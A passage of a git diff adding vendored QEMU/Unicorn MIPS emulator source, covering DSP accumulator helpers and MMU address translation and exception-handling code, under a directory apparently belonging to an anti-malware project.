32767)) { + temp[0] &= 0xFFFF0000; + temp[0] |= 0x00007FFF; + set_DSPControl_overflow_flag(1, 23, env); + } else if ((temp127 == 1) && + (temp[1] < 0xFFFFFFFFFFFFFFFFll + || temp[0] < 0xFFFFFFFFFFFF1000ll)) { + temp[0] &= 0xFFFF0000; + temp[0] |= 0x00008000; + set_DSPControl_overflow_flag(1, 23, env); + } + + return (int64_t)(int16_t)(temp[0] & MIPSDSP_LO); +} + +#endif + +target_ulong helper_extp(target_ulong ac, target_ulong size, CPUMIPSState *env) +{ + int32_t start_pos; + int sub; + uint32_t temp; + uint64_t acc; + + size = 
size & 0x1F; + + temp = 0; + start_pos = get_DSPControl_pos(env); + sub = start_pos - (size + 1); + if (sub >= -1) { + acc = ((uint64_t)env->active_tc.HI[ac] << 32) | + ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO); + temp = (acc >> (start_pos - size)) & (~0U >> (31 - size)); + set_DSPControl_efi(0, env); + } else { + set_DSPControl_efi(1, env); + } + + return (target_ulong)temp; +} + +target_ulong helper_extpdp(target_ulong ac, target_ulong size, + CPUMIPSState *env) +{ + int32_t start_pos; + int sub; + uint32_t temp; + uint64_t acc; + + size = size & 0x1F; + temp = 0; + start_pos = get_DSPControl_pos(env); + sub = start_pos - (size + 1); + if (sub >= -1) { + acc = ((uint64_t)env->active_tc.HI[ac] << 32) | + ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO); + temp = extract64(acc, start_pos - size, size + 1); + + set_DSPControl_pos(sub, env); + set_DSPControl_efi(0, env); + } else { + set_DSPControl_efi(1, env); + } + + return (target_ulong)temp; +} + + +#if defined(TARGET_MIPS64) +target_ulong helper_dextp(target_ulong ac, target_ulong size, CPUMIPSState *env) +{ + int start_pos; + int len; + int sub; + uint64_t tempB, tempA; + uint64_t temp; + + temp = 0; + + size = size & 0x3F; + start_pos = get_DSPControl_pos(env); + len = start_pos - size; + tempB = env->active_tc.HI[ac]; + tempA = env->active_tc.LO[ac]; + + sub = start_pos - (size + 1); + + if (sub >= -1) { + temp = (tempB << (64 - len)) | (tempA >> len); + temp = temp & ((0x01 << (size + 1)) - 1); + set_DSPControl_efi(0, env); + } else { + set_DSPControl_efi(1, env); + } + + return temp; +} + +target_ulong helper_dextpdp(target_ulong ac, target_ulong size, + CPUMIPSState *env) +{ + int start_pos; + int len; + int sub; + uint64_t tempB, tempA; + uint64_t temp; + + temp = 0; + size = size & 0x3F; + start_pos = get_DSPControl_pos(env); + len = start_pos - size; + tempB = env->active_tc.HI[ac]; + tempA = env->active_tc.LO[ac]; + + sub = start_pos - (size + 1); + + if (sub >= -1) { + temp = (tempB << (64 - 
len)) | (tempA >> len); + temp = temp & ((0x01 << (size + 1)) - 1); + set_DSPControl_pos(sub, env); + set_DSPControl_efi(0, env); + } else { + set_DSPControl_efi(1, env); + } + + return temp; +} + +#endif + +void helper_shilo(target_ulong ac, target_ulong rs, CPUMIPSState *env) +{ + int8_t rs5_0; + uint64_t temp, acc; + + rs5_0 = rs & 0x3F; + rs5_0 = (int8_t)(rs5_0 << 2) >> 2; + + if (unlikely(rs5_0 == 0)) { + return; + } + + acc = (((uint64_t)env->active_tc.HI[ac] << 32) & MIPSDSP_LHI) | + ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO); + + if (rs5_0 > 0) { + temp = acc >> rs5_0; + } else { + temp = acc << -rs5_0; + } + + env->active_tc.HI[ac] = (target_ulong)(int32_t)((temp & MIPSDSP_LHI) >> 32); + env->active_tc.LO[ac] = (target_ulong)(int32_t)(temp & MIPSDSP_LLO); +} + +#if defined(TARGET_MIPS64) +void helper_dshilo(target_ulong shift, target_ulong ac, CPUMIPSState *env) +{ + int8_t shift_t; + uint64_t tempB, tempA; + + shift_t = (int8_t)(shift << 1) >> 1; + + tempB = env->active_tc.HI[ac]; + tempA = env->active_tc.LO[ac]; + + if (shift_t != 0) { + if (shift_t >= 0) { + tempA = (tempB << (64 - shift_t)) | (tempA >> shift_t); + tempB = tempB >> shift_t; + } else { + shift_t = -shift_t; + tempB = (tempB << shift_t) | (tempA >> (64 - shift_t)); + tempA = tempA << shift_t; + } + } + + env->active_tc.HI[ac] = tempB; + env->active_tc.LO[ac] = tempA; +} + +#endif +void helper_mthlip(target_ulong ac, target_ulong rs, CPUMIPSState *env) +{ + int32_t tempA, tempB, pos; + + tempA = rs; + tempB = env->active_tc.LO[ac]; + env->active_tc.HI[ac] = (target_long)tempB; + env->active_tc.LO[ac] = (target_long)tempA; + pos = get_DSPControl_pos(env); + + if (pos > 32) { + return; + } else { + set_DSPControl_pos(pos + 32, env); + } +} + +#if defined(TARGET_MIPS64) +void helper_dmthlip(target_ulong rs, target_ulong ac, CPUMIPSState *env) +{ + uint8_t ac_t; + uint8_t pos; + uint64_t tempB, tempA; + + ac_t = ac & 0x3; + + tempA = rs; + tempB = env->active_tc.LO[ac_t]; + + 
env->active_tc.HI[ac_t] = tempB; + env->active_tc.LO[ac_t] = tempA; + + pos = get_DSPControl_pos(env); + + if (pos <= 64) { + pos = pos + 64; + set_DSPControl_pos(pos, env); + } +} +#endif + +void cpu_wrdsp(uint32_t rs, uint32_t mask_num, CPUMIPSState *env) +{ + uint8_t mask[6]; + uint8_t i; + uint32_t newbits, overwrite; + target_ulong dsp; + + newbits = 0x00; + overwrite = 0xFFFFFFFF; + dsp = env->active_tc.DSPControl; + + for (i = 0; i < 6; i++) { + mask[i] = (mask_num >> i) & 0x01; + } + + if (mask[0] == 1) { +#if defined(TARGET_MIPS64) + overwrite &= 0xFFFFFF80; + newbits &= 0xFFFFFF80; + newbits |= 0x0000007F & rs; +#else + overwrite &= 0xFFFFFFC0; + newbits &= 0xFFFFFFC0; + newbits |= 0x0000003F & rs; +#endif + } + + if (mask[1] == 1) { + overwrite &= 0xFFFFE07F; + newbits &= 0xFFFFE07F; + newbits |= 0x00001F80 & rs; + } + + if (mask[2] == 1) { + overwrite &= 0xFFFFDFFF; + newbits &= 0xFFFFDFFF; + newbits |= 0x00002000 & rs; + } + + if (mask[3] == 1) { + overwrite &= 0xFF00FFFF; + newbits &= 0xFF00FFFF; + newbits |= 0x00FF0000 & rs; + } + + if (mask[4] == 1) { + overwrite &= 0x00FFFFFF; + newbits &= 0x00FFFFFF; +#if defined(TARGET_MIPS64) + newbits |= 0xFF000000 & rs; +#else + newbits |= 0x0F000000 & rs; +#endif + } + + if (mask[5] == 1) { + overwrite &= 0xFFFFBFFF; + newbits &= 0xFFFFBFFF; + newbits |= 0x00004000 & rs; + } + + dsp = dsp & overwrite; + dsp = dsp | newbits; + env->active_tc.DSPControl = dsp; +} + +void helper_wrdsp(target_ulong rs, target_ulong mask_num, CPUMIPSState *env) +{ + cpu_wrdsp(rs, mask_num, env); +} + +uint32_t cpu_rddsp(uint32_t mask_num, CPUMIPSState *env) +{ + uint8_t mask[6]; + uint32_t ruler, i; + target_ulong temp; + target_ulong dsp; + + ruler = 0x01; + for (i = 0; i < 6; i++) { + mask[i] = (mask_num & ruler) >> i ; + ruler = ruler << 1; + } + + temp = 0x00; + dsp = env->active_tc.DSPControl; + + if (mask[0] == 1) { +#if defined(TARGET_MIPS64) + temp |= dsp & 0x7F; +#else + temp |= dsp & 0x3F; +#endif + } + + if (mask[1] == 
1) { + temp |= dsp & 0x1F80; + } + + if (mask[2] == 1) { + temp |= dsp & 0x2000; + } + + if (mask[3] == 1) { + temp |= dsp & 0x00FF0000; + } + + if (mask[4] == 1) { +#if defined(TARGET_MIPS64) + temp |= dsp & 0xFF000000; +#else + temp |= dsp & 0x0F000000; +#endif + } + + if (mask[5] == 1) { + temp |= dsp & 0x4000; + } + + return temp; +} + +target_ulong helper_rddsp(target_ulong mask_num, CPUMIPSState *env) +{ + return cpu_rddsp(mask_num, env); +} + + +#undef MIPSDSP_LHI +#undef MIPSDSP_LLO +#undef MIPSDSP_HI +#undef MIPSDSP_LO +#undef MIPSDSP_Q3 +#undef MIPSDSP_Q2 +#undef MIPSDSP_Q1 +#undef MIPSDSP_Q0 + +#undef MIPSDSP_SPLIT32_8 +#undef MIPSDSP_SPLIT32_16 + +#undef MIPSDSP_RETURN32_8 +#undef MIPSDSP_RETURN32_16 + +#ifdef TARGET_MIPS64 +#undef MIPSDSP_SPLIT64_16 +#undef MIPSDSP_SPLIT64_32 +#undef MIPSDSP_RETURN64_16 +#undef MIPSDSP_RETURN64_32 +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/helper.c new file mode 100644 index 0000000..749584c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/helper.c @@ -0,0 +1,826 @@ +/* + * MIPS emulation helpers for qemu. + * + * Copyright (c) 2004-2005 Jocelyn Mayer + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . 
+ */ +#include +#include +#include +#include +#include "unicorn/platform.h" +#include + +#include "cpu.h" +#include "exec/cpu_ldst.h" + +enum { + TLBRET_XI = -6, + TLBRET_RI = -5, + TLBRET_DIRTY = -4, + TLBRET_INVALID = -3, + TLBRET_NOMATCH = -2, + TLBRET_BADADDR = -1, + TLBRET_MATCH = 0 +}; + +#if !defined(CONFIG_USER_ONLY) + +/* no MMU emulation */ +int no_mmu_map_address (CPUMIPSState *env, hwaddr *physical, int *prot, + target_ulong address, int rw, int access_type) +{ + *physical = address; + *prot = PAGE_READ | PAGE_WRITE; + return TLBRET_MATCH; +} + +/* fixed mapping MMU emulation */ +int fixed_mmu_map_address (CPUMIPSState *env, hwaddr *physical, int *prot, + target_ulong address, int rw, int access_type) +{ + if (address <= (int32_t)0x7FFFFFFFUL) { + if (!(env->CP0_Status & (1 << CP0St_ERL))) + *physical = address + 0x40000000UL; + else + *physical = address; + } else if (address <= (int32_t)0xBFFFFFFFUL) + *physical = address & 0x1FFFFFFF; + else + *physical = address; + + *prot = PAGE_READ | PAGE_WRITE; + return TLBRET_MATCH; +} + +/* MIPS32/MIPS64 R4000-style MMU emulation */ +int r4k_map_address (CPUMIPSState *env, hwaddr *physical, int *prot, + target_ulong address, int rw, int access_type) +{ + uint8_t ASID = env->CP0_EntryHi & 0xFF; + int i; + + for (i = 0; i < env->tlb->tlb_in_use; i++) { + r4k_tlb_t *tlb = &env->tlb->mmu.r4k.tlb[i]; + /* 1k pages are not supported. */ + target_ulong mask = tlb->PageMask | ~(((unsigned int)TARGET_PAGE_MASK) << 1); + target_ulong tag = address & ~mask; + target_ulong VPN = tlb->VPN & ~mask; +#if defined(TARGET_MIPS64) + tag &= env->SEGMask; +#endif + + /* Check ASID, virtual page number & size */ + if ((tlb->G == 1 || tlb->ASID == ASID) && VPN == tag && !tlb->EHINV) { + /* TLB match */ + int n = !!(address & mask & ~(mask >> 1)); + /* Check access rights */ + if (!(n ? tlb->V1 : tlb->V0)) { + return TLBRET_INVALID; + } + if (rw == MMU_INST_FETCH && (n ? 
tlb->XI1 : tlb->XI0)) { + return TLBRET_XI; + } + if (rw == MMU_DATA_LOAD && (n ? tlb->RI1 : tlb->RI0)) { + return TLBRET_RI; + } + if (rw != MMU_DATA_STORE || (n ? tlb->D1 : tlb->D0)) { + *physical = tlb->PFN[n] | (address & (mask >> 1)); + *prot = PAGE_READ; + if (n ? tlb->D1 : tlb->D0) + *prot |= PAGE_WRITE; + return TLBRET_MATCH; + } + return TLBRET_DIRTY; + } + } + return TLBRET_NOMATCH; +} + +static int get_physical_address (CPUMIPSState *env, hwaddr *physical, + int *prot, target_ulong real_address, + int rw, int access_type) +{ + /* User mode can only access useg/xuseg */ + int user_mode = (env->hflags & MIPS_HFLAG_MODE) == MIPS_HFLAG_UM; + int supervisor_mode = (env->hflags & MIPS_HFLAG_MODE) == MIPS_HFLAG_SM; + int kernel_mode = !user_mode && !supervisor_mode; +#if defined(TARGET_MIPS64) + int UX = (env->CP0_Status & (1 << CP0St_UX)) != 0; + int SX = (env->CP0_Status & (1 << CP0St_SX)) != 0; + int KX = (env->CP0_Status & (1 << CP0St_KX)) != 0; +#endif + int ret = TLBRET_MATCH; + /* effective address (modified for KVM T&E kernel segments) */ + target_ulong address = real_address; + +#if 0 + qemu_log("user mode %d h %08x\n", user_mode, env->hflags); +#endif + +#define USEG_LIMIT 0x7FFFFFFFUL +#define KSEG0_BASE 0x80000000UL +#define KSEG1_BASE 0xA0000000UL +#define KSEG2_BASE 0xC0000000UL +#define KSEG3_BASE 0xE0000000UL + +#define KVM_KSEG0_BASE 0x40000000UL +#define KVM_KSEG2_BASE 0x60000000UL + + if (address <= USEG_LIMIT) { + /* useg */ + if (env->CP0_Status & (1 << CP0St_ERL)) { + *physical = address & 0xFFFFFFFF; + *prot = PAGE_READ | PAGE_WRITE; + } else { + ret = env->tlb->map_address(env, physical, prot, real_address, rw, access_type); + } +#if defined(TARGET_MIPS64) + } else if (address < 0x4000000000000000ULL) { + /* xuseg */ + if (UX && address <= (0x3FFFFFFFFFFFFFFFULL & env->SEGMask)) { + ret = env->tlb->map_address(env, physical, prot, real_address, rw, access_type); + } else { + ret = TLBRET_BADADDR; + } + } else if (address < 
0x8000000000000000ULL) { + /* xsseg */ + if ((supervisor_mode || kernel_mode) && + SX && address <= (0x7FFFFFFFFFFFFFFFULL & env->SEGMask)) { + ret = env->tlb->map_address(env, physical, prot, real_address, rw, access_type); + } else { + ret = TLBRET_BADADDR; + } + } else if (address < 0xC000000000000000ULL) { + /* xkphys */ + if (kernel_mode && KX && + (address & 0x07FFFFFFFFFFFFFFULL) <= env->PAMask) { + *physical = address & env->PAMask; + *prot = PAGE_READ | PAGE_WRITE; + } else { + ret = TLBRET_BADADDR; + } + } else if (address < 0xFFFFFFFF80000000ULL) { + /* xkseg */ + if (kernel_mode && KX && + address <= (0xFFFFFFFF7FFFFFFFULL & env->SEGMask)) { + ret = env->tlb->map_address(env, physical, prot, real_address, rw, access_type); + } else { + ret = TLBRET_BADADDR; + } +#endif + } else if (address < (int32_t)KSEG1_BASE) { + /* kseg0 */ + if (kernel_mode) { + *physical = address - (int32_t)KSEG0_BASE; + *prot = PAGE_READ | PAGE_WRITE; + } else { + ret = TLBRET_BADADDR; + } + } else if (address < (int32_t)KSEG2_BASE) { + /* kseg1 */ + if (kernel_mode) { + *physical = address - (int32_t)KSEG1_BASE; + *prot = PAGE_READ | PAGE_WRITE; + } else { + ret = TLBRET_BADADDR; + } + } else if (address < (int32_t)KSEG3_BASE) { + /* sseg (kseg2) */ + if (supervisor_mode || kernel_mode) { + ret = env->tlb->map_address(env, physical, prot, real_address, rw, access_type); + } else { + ret = TLBRET_BADADDR; + } + } else { + /* kseg3 */ + /* XXX: debug segment is not emulated */ + if (kernel_mode) { + ret = env->tlb->map_address(env, physical, prot, real_address, rw, access_type); + } else { + ret = TLBRET_BADADDR; + } + } +#if 0 + qemu_log(TARGET_FMT_lx " %d %d => %" HWADDR_PRIx " %d (%d)\n", + address, rw, access_type, *physical, *prot, ret); +#endif + + return ret; +} +#endif + +static void raise_mmu_exception(CPUMIPSState *env, target_ulong address, + int rw, int tlb_error) +{ + CPUState *cs = CPU(mips_env_get_cpu(env)); + int exception = 0, error_code = 0; + + if (rw == 
MMU_INST_FETCH) { + error_code |= EXCP_INST_NOTAVAIL; + } + + switch (tlb_error) { + default: + case TLBRET_BADADDR: + /* Reference to kernel address from user mode or supervisor mode */ + /* Reference to supervisor address from user mode */ + if (rw == MMU_DATA_STORE) { + exception = EXCP_AdES; + } else { + exception = EXCP_AdEL; + } + break; + case TLBRET_NOMATCH: + /* No TLB match for a mapped address */ + if (rw == MMU_DATA_STORE) { + exception = EXCP_TLBS; + } else { + exception = EXCP_TLBL; + } + error_code |= EXCP_TLB_NOMATCH; + break; + case TLBRET_INVALID: + /* TLB match with no valid bit */ + if (rw == MMU_DATA_STORE) { + exception = EXCP_TLBS; + } else { + exception = EXCP_TLBL; + } + break; + case TLBRET_DIRTY: + /* TLB match but 'D' bit is cleared */ + exception = EXCP_LTLBL; + break; + case TLBRET_XI: + /* Execute-Inhibit Exception */ + if (env->CP0_PageGrain & (1 << CP0PG_IEC)) { + exception = EXCP_TLBXI; + } else { + exception = EXCP_TLBL; + } + break; + case TLBRET_RI: + /* Read-Inhibit Exception */ + if (env->CP0_PageGrain & (1 << CP0PG_IEC)) { + exception = EXCP_TLBRI; + } else { + exception = EXCP_TLBL; + } + break; + } + /* Raise exception */ + env->CP0_BadVAddr = address; + env->CP0_Context = (env->CP0_Context & ~0x007fffff) | + ((address >> 9) & 0x007ffff0); + env->CP0_EntryHi = + (env->CP0_EntryHi & 0xFF) | (address & (((unsigned int)TARGET_PAGE_MASK) << 1)); +#if defined(TARGET_MIPS64) + env->CP0_EntryHi &= env->SEGMask; + env->CP0_XContext = (env->CP0_XContext & ((~0ULL) << (env->SEGBITS - 7))) | + ((address & 0xC00000000000ULL) >> (55 - env->SEGBITS)) | + ((address & ((1ULL << env->SEGBITS) - 1) & 0xFFFFFFFFFFFFE000ULL) >> 9); +#endif + cs->exception_index = exception; + env->error_code = error_code; +} + +#if !defined(CONFIG_USER_ONLY) +hwaddr mips_cpu_get_phys_page_debug(CPUState *cs, vaddr addr) +{ + MIPSCPU *cpu = MIPS_CPU(cs->uc, cs); + hwaddr phys_addr; + int prot; + + if (get_physical_address(&cpu->env, &phys_addr, &prot, addr, 0, 
+ ACCESS_INT) != 0) { + return -1; + } + return phys_addr; +} +#endif + +int mips_cpu_handle_mmu_fault(CPUState *cs, vaddr address, int rw, + int mmu_idx) +{ + MIPSCPU *cpu = MIPS_CPU(cs->uc, cs); + CPUMIPSState *env = &cpu->env; +#if !defined(CONFIG_USER_ONLY) + hwaddr physical; + int prot; + int access_type; +#endif + int ret = 0; + +#if 0 + log_cpu_state(cs, 0); +#endif + qemu_log("%s pc " TARGET_FMT_lx " ad %" VADDR_PRIx " rw %d mmu_idx %d\n", + __func__, env->active_tc.PC, address, rw, mmu_idx); + + /* data access */ +#if !defined(CONFIG_USER_ONLY) + /* XXX: put correct access by using cpu_restore_state() + correctly */ + access_type = ACCESS_INT; + ret = get_physical_address(env, &physical, &prot, + address, rw, access_type); + qemu_log("%s address=%" VADDR_PRIx " ret %d physical " TARGET_FMT_plx + " prot %d\n", + __func__, address, ret, physical, prot); + if (ret == TLBRET_MATCH) { + if (mmu_idx < 0 || mmu_idx >= NB_MMU_MODES) { + raise_mmu_exception(env, address, rw, ret); + ret = 1; + } else { + tlb_set_page(cs, address & TARGET_PAGE_MASK, + physical & TARGET_PAGE_MASK, prot | PAGE_EXEC, + mmu_idx, TARGET_PAGE_SIZE); + ret = 0; + } + } else if (ret < 0) +#endif + { + raise_mmu_exception(env, address, rw, ret); + ret = 1; + } + + return ret; +} + +#if !defined(CONFIG_USER_ONLY) +hwaddr cpu_mips_translate_address(CPUMIPSState *env, target_ulong address, int rw) +{ + hwaddr physical; + int prot; + int access_type; + int ret = 0; + + /* data access */ + access_type = ACCESS_INT; + ret = get_physical_address(env, &physical, &prot, + address, rw, access_type); + if (ret != TLBRET_MATCH) { + raise_mmu_exception(env, address, rw, ret); + return -1LL; + } else { + return physical; + } +} +#endif + +static const char * const excp_names[EXCP_LAST + 1] = { + "reset", + "soft reset", + "debug single step", + "debug interrupt", + "debug data break load", + "debug data break store", + "non-maskable interrupt", + "machine check", + "interrupt", + "deferred watchpoint", + 
"debug instruction breakpoint", + "instruction fetch watchpoint", + "address error load", + "address error store", + "TLB refill", + "instruction bus error", + "debug breakpoint", + "syscall", + "break", + "coprocessor unusable", + "reserved instruction", + "arithmetic overflow", + "trap", + "floating point", + "data watchpoint", + "TLB modify", + "TLB load", + "TLB store", + "data bus error", + "thread", + "MDMX", + "precise coprocessor 2", + "cache error", + "DSP disabled", + "MSA disabled", + "MSA floating point", + "TLB execute-inhibit", + "TLB read-inhibit", +}; + +target_ulong exception_resume_pc (CPUMIPSState *env) +{ + target_ulong bad_pc; + target_ulong isa_mode; + + isa_mode = !!(env->hflags & MIPS_HFLAG_M16); + bad_pc = env->active_tc.PC | isa_mode; + if (env->hflags & MIPS_HFLAG_BMASK) { + /* If the exception was raised from a delay slot, come back to + the jump. */ + bad_pc -= (env->hflags & MIPS_HFLAG_B16 ? 2 : 4); + } + + return bad_pc; +} + +#if !defined(CONFIG_USER_ONLY) +static void set_hflags_for_handler (CPUMIPSState *env) +{ + /* Exception handlers are entered in 32-bit mode. */ + env->hflags &= ~(MIPS_HFLAG_M16); + /* ...except that microMIPS lets you choose. 
*/ + if (env->insn_flags & ASE_MICROMIPS) { + env->hflags |= (!!(env->CP0_Config3 + & (1 << CP0C3_ISA_ON_EXC)) + << MIPS_HFLAG_M16_SHIFT); + } +} + +static inline void set_badinstr_registers(CPUMIPSState *env) +{ + if (env->hflags & MIPS_HFLAG_M16) { + /* TODO: add BadInstr support for microMIPS */ + return; + } + if (env->CP0_Config3 & (1 << CP0C3_BI)) { + env->CP0_BadInstr = cpu_ldl_code(env, env->active_tc.PC); + } + if ((env->CP0_Config3 & (1 << CP0C3_BP)) && + (env->hflags & MIPS_HFLAG_BMASK)) { + env->CP0_BadInstrP = cpu_ldl_code(env, env->active_tc.PC - 4); + } +} +#endif + +void mips_cpu_do_interrupt(CPUState *cs) +{ +#if !defined(CONFIG_USER_ONLY) + MIPSCPU *cpu = MIPS_CPU(cs->uc, cs); + CPUMIPSState *env = &cpu->env; + bool update_badinstr = 0; + target_ulong offset; + int cause = -1; + const char *name; + + if (qemu_log_enabled() && cs->exception_index != EXCP_EXT_INTERRUPT) { + if (cs->exception_index < 0 || cs->exception_index > EXCP_LAST) { + name = "unknown"; + } else { + name = excp_names[cs->exception_index]; + } + + qemu_log("%s enter: PC " TARGET_FMT_lx " EPC " TARGET_FMT_lx " %s exception\n", + __func__, env->active_tc.PC, env->CP0_EPC, name); + } + if (cs->exception_index == EXCP_EXT_INTERRUPT && + (env->hflags & MIPS_HFLAG_DM)) { + cs->exception_index = EXCP_DINT; + } + offset = 0x180; + switch (cs->exception_index) { + case EXCP_DSS: + env->CP0_Debug |= 1 << CP0DB_DSS; + /* Debug single step cannot be raised inside a delay slot and + resume will always occur on the next instruction + (but we assume the pc has always been updated during + code translation). 
*/ + env->CP0_DEPC = env->active_tc.PC | !!(env->hflags & MIPS_HFLAG_M16); + goto enter_debug_mode; + case EXCP_DINT: + env->CP0_Debug |= 1 << CP0DB_DINT; + goto set_DEPC; + case EXCP_DIB: + env->CP0_Debug |= 1 << CP0DB_DIB; + goto set_DEPC; + case EXCP_DBp: + env->CP0_Debug |= 1 << CP0DB_DBp; + goto set_DEPC; + case EXCP_DDBS: + env->CP0_Debug |= 1 << CP0DB_DDBS; + goto set_DEPC; + case EXCP_DDBL: + env->CP0_Debug |= 1 << CP0DB_DDBL; + set_DEPC: + env->CP0_DEPC = exception_resume_pc(env); + env->hflags &= ~MIPS_HFLAG_BMASK; + enter_debug_mode: + env->hflags |= MIPS_HFLAG_DM | MIPS_HFLAG_64 | MIPS_HFLAG_CP0; + env->hflags &= ~(MIPS_HFLAG_KSU); + /* EJTAG probe trap enable is not implemented... */ + if (!(env->CP0_Status & (1 << CP0St_EXL))) + env->CP0_Cause &= ~(1U << CP0Ca_BD); + env->active_tc.PC = (int32_t)0xBFC00480; + set_hflags_for_handler(env); + break; + case EXCP_RESET: + cpu_reset(CPU(cpu)); + break; + case EXCP_SRESET: + env->CP0_Status |= (1 << CP0St_SR); + /* memset CP0_WatchLo which is fixed size array. */ + memset(env->CP0_WatchLo, 0, sizeof(env->CP0_WatchLo)); + goto set_error_EPC; + case EXCP_NMI: + env->CP0_Status |= (1 << CP0St_NMI); + set_error_EPC: + env->CP0_ErrorEPC = exception_resume_pc(env); + env->hflags &= ~MIPS_HFLAG_BMASK; + env->CP0_Status |= (1 << CP0St_ERL) | (1 << CP0St_BEV); + env->hflags |= MIPS_HFLAG_64 | MIPS_HFLAG_CP0; + env->hflags &= ~(MIPS_HFLAG_KSU); + if (!(env->CP0_Status & (1 << CP0St_EXL))) + env->CP0_Cause &= ~(1U << CP0Ca_BD); + env->active_tc.PC = (int32_t)0xBFC00000; + set_hflags_for_handler(env); + break; + case EXCP_EXT_INTERRUPT: + cause = 0; + if (env->CP0_Cause & (1 << CP0Ca_IV)) + offset = 0x200; + + if (env->CP0_Config3 & ((1 << CP0C3_VInt) | (1 << CP0C3_VEIC))) { + /* Vectored Interrupts. */ + unsigned int spacing; + unsigned int vector; + unsigned int pending = (env->CP0_Cause & CP0Ca_IP_mask) >> 8; + + pending &= env->CP0_Status >> 8; + /* Compute the Vector Spacing. 
*/ + spacing = (env->CP0_IntCtl >> CP0IntCtl_VS) & ((1 << 6) - 1); + spacing <<= 5; + + if (env->CP0_Config3 & (1 << CP0C3_VInt)) { + /* For VInt mode, the MIPS computes the vector internally. */ + for (vector = 7; vector > 0; vector--) { + if (pending & (1 << vector)) { + /* Found it. */ + break; + } + } + } else { + /* For VEIC mode, the external interrupt controller feeds the + vector through the CP0Cause IP lines. */ + vector = pending; + } + offset = 0x200 + vector * spacing; + } + goto set_EPC; + case EXCP_LTLBL: + cause = 1; + update_badinstr = !(env->error_code & EXCP_INST_NOTAVAIL); + goto set_EPC; + case EXCP_TLBL: + cause = 2; + update_badinstr = !(env->error_code & EXCP_INST_NOTAVAIL); + if ((env->error_code & EXCP_TLB_NOMATCH) && + !(env->CP0_Status & (1 << CP0St_EXL))) { +#if defined(TARGET_MIPS64) + int R = env->CP0_BadVAddr >> 62; + int UX = (env->CP0_Status & (1 << CP0St_UX)) != 0; + int SX = (env->CP0_Status & (1 << CP0St_SX)) != 0; + int KX = (env->CP0_Status & (1 << CP0St_KX)) != 0; + + if (((R == 0 && UX) || (R == 1 && SX) || (R == 3 && KX)) && + (!(env->insn_flags & (INSN_LOONGSON2E | INSN_LOONGSON2F)))) + offset = 0x080; + else +#endif + offset = 0x000; + } + goto set_EPC; + case EXCP_TLBS: + cause = 3; + update_badinstr = 1; + if ((env->error_code & EXCP_TLB_NOMATCH) && + !(env->CP0_Status & (1 << CP0St_EXL))) { +#if defined(TARGET_MIPS64) + int R = env->CP0_BadVAddr >> 62; + int UX = (env->CP0_Status & (1 << CP0St_UX)) != 0; + int SX = (env->CP0_Status & (1 << CP0St_SX)) != 0; + int KX = (env->CP0_Status & (1 << CP0St_KX)) != 0; + + if (((R == 0 && UX) || (R == 1 && SX) || (R == 3 && KX)) && + (!(env->insn_flags & (INSN_LOONGSON2E | INSN_LOONGSON2F)))) + offset = 0x080; + else +#endif + offset = 0x000; + } + goto set_EPC; + case EXCP_AdEL: + cause = 4; + update_badinstr = !(env->error_code & EXCP_INST_NOTAVAIL); + goto set_EPC; + case EXCP_AdES: + cause = 5; + update_badinstr = 1; + goto set_EPC; + case EXCP_IBE: + cause = 6; + goto 
set_EPC; + case EXCP_DBE: + cause = 7; + goto set_EPC; + case EXCP_SYSCALL: + cause = 8; + update_badinstr = 1; + goto set_EPC; + case EXCP_BREAK: + cause = 9; + update_badinstr = 1; + goto set_EPC; + case EXCP_RI: + cause = 10; + update_badinstr = 1; + goto set_EPC; + case EXCP_CpU: + cause = 11; + update_badinstr = 1; + env->CP0_Cause = (env->CP0_Cause & ~(0x3 << CP0Ca_CE)) | + (env->error_code << CP0Ca_CE); + goto set_EPC; + case EXCP_OVERFLOW: + cause = 12; + update_badinstr = 1; + goto set_EPC; + case EXCP_TRAP: + cause = 13; + update_badinstr = 1; + goto set_EPC; + case EXCP_MSAFPE: + cause = 14; + update_badinstr = 1; + goto set_EPC; + case EXCP_FPE: + cause = 15; + update_badinstr = 1; + goto set_EPC; + case EXCP_C2E: + cause = 18; + goto set_EPC; + case EXCP_TLBRI: + cause = 19; + update_badinstr = 1; + goto set_EPC; + case EXCP_TLBXI: + cause = 20; + goto set_EPC; + case EXCP_MSADIS: + cause = 21; + update_badinstr = 1; + goto set_EPC; + case EXCP_MDMX: + cause = 22; + goto set_EPC; + case EXCP_DWATCH: + cause = 23; + /* XXX: TODO: manage defered watch exceptions */ + goto set_EPC; + case EXCP_MCHECK: + cause = 24; + goto set_EPC; + case EXCP_THREAD: + cause = 25; + goto set_EPC; + case EXCP_DSPDIS: + cause = 26; + goto set_EPC; + case EXCP_CACHE: + cause = 30; + if (env->CP0_Status & (1 << CP0St_BEV)) { + offset = 0x100; + } else { + offset = 0x20000100; + } + set_EPC: + if (!(env->CP0_Status & (1 << CP0St_EXL))) { + env->CP0_EPC = exception_resume_pc(env); + if (update_badinstr) { + set_badinstr_registers(env); + } + if (env->hflags & MIPS_HFLAG_BMASK) { + env->CP0_Cause |= (1U << CP0Ca_BD); + } else { + env->CP0_Cause &= ~(1U << CP0Ca_BD); + } + env->CP0_Status |= (1 << CP0St_EXL); + env->hflags |= MIPS_HFLAG_64 | MIPS_HFLAG_CP0; + env->hflags &= ~(MIPS_HFLAG_KSU); + } + env->hflags &= ~MIPS_HFLAG_BMASK; + if (env->CP0_Status & (1 << CP0St_BEV)) { + env->active_tc.PC = (int32_t)0xBFC00200; + } else { + env->active_tc.PC = (int32_t)(env->CP0_EBase & 
